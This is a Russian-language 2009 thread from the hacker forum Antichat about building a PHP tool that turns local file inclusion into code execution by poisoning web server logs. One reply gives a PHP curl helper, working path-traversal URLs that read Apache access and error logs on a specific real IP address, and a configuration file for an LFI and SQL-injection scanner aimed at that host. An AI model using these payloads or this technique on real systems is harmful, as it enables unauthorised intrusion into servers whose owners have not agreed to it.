Форум АНТИЧАТ

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   PHP, PERL, MySQL, JavaScript (https://forum.antichat.xyz/forumdisplay.php?f=37)
-   -   Помогите написать автоинклудер на PHP (https://forum.antichat.xyz/showthread.php?t=128465)

nub-hacker 06.07.2009 00:33
Помогите написать автоинклудер на PHP
 
Всем привет. Может кто сталкивался с php инклудом, тем нужны были логи, чтобы ззабить туда пхп код и заинлудеть. Но мне в падлу переьеоать в ручную пути к логам. Вот я хочу написать сам скрипт на пхп. Я знаю токо основы пхп и прошу вашей помощи.

Помогите составить алгоритм. и я буду оч. признателен если кто напишет простенький каркас(основу) инлкдера.

ЗЫ готовый не предлагать. я юзал инлудер от Pashkela. Но он жопный. Плохо, медленно, и некаректно работает . и др. не лучше.


///

УДАЛИТЕ ТЕМУ УМАЛЯЮ

Fata1ex 06.07.2009 00:39
Как каркас можно использовать уже написанные. Благо их довольно много.
Мм и да, инклуд можно осуществить не только через логи )

Ch3ck 06.07.2009 00:44
_https://forum.antichat.ru/showpost.php?p=467814&postcount=2
Хм... архив у Электа битый... нашел тут:
_http://forum.blackhack.ru/showthread.php?t=2644

Pashkela 06.07.2009 00:53
мой круче:))) Просто у ТС руки не из того места растут:)

Spyder 08.07.2009 12:20
https://forum.antichat.ru/thread127462.html
ппц

Pashkela 08.07.2009 12:57
Если камушек в мой огород, то просто добавляем функцию получения информации через курлы:

PHP код:
function get($url
    { 
        $ch curl_init();   
        curl_setopt($chCURLOPT_URL,$url); 
        curl_setopt($chCURLOPT_RETURNTRANSFER,1); 
        curl_setopt($chCURLOPT_USERAGENT'Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.9.0.1) Gecko/2008070208'); 
        $ss=curl_exec($ch); 
        curl_close($ch); 
        return $ss
    } 
и везде в коде scan меняем на get, и всё пашет, вот доказательства:

Код:
http://137.207.248.30/60-270/php/viewsource.php?fname=../../../../../../../var/log/apache2/access_log
http://137.207.248.30/60-270/php/viewsource.php?fname=../../../../../../../var/log/apache2/error_log
просто через fsockopen не всегда почему-то дает парсить

phpinj.ini для конкретно данного случая:

Код:
;=========================================

MODE = 1 ; <= режим сканирования

;MODE = 1 - имеется LFI, при неправильном запросе ВИДЕН текст ошибки
;MODE = 2 - имеется LFI, при неправильном запросе НЕ ВИДЕН текст ошибки (ниже требуется ввести URL, вызывающий ошибку)
;MODE = 3 - имеется SQL-INJ + file_priv=Y + magic_quotes=OFF, при неправильном запросе ВИДЕН текст ошибки
;MODE = 4 - имеется SQL-INJ + file_priv=Y + magic_quotes=OFF, при неправильном запросе НЕ ВИДЕН текст ошибки (ниже требуется ввести URL, вызывающий ошибку)
;MODE = 5 - имеется SQL-INJ + file_priv=Y + magic_quotes=ON, при неправильном запросе ВИДЕН текст ошибки
;MODE = 6 - имеется SQL-INJ + file_priv=Y + magic_quotes=ON, при неправильном запросе НЕ ВИДЕН текст ошибки (ниже требуется ввести URL, вызывающий ошибку)
;=========================================
; url-для сканирования (начало)
;----------------------------------------------------------------------------------------------------
URL = "http://137.207.248.30/60-270/php/viewsource.php?fname=../../../../../../../"
;----------------------------------------------------------------------------------------------------
; url, которая вызывает ошибку
;----------------------------------------------------------------------------------------------------
ERROR_URL = ""
;----------------------------------------------------------------------------------------------------
; окончание url-для сканирования
;----------------------------------------------------------------------------------------------------
URL_END = ""
;----------------------------------------------------------------------------------------------------
; Текст ошибки, при вызове ошибочной страницы, четко показывающая, что искомый параметр не найден (если ошибки видны)
;----------------------------------------------------------------------------------------------------
ERROR_MESSAGE = Error
;----------------------------------------------------------------------------------------------------
PAUSE = 0  ; Пауза между запросами
Но с курлами будет работать только .php, .exe пахать не будет


Время: 00:57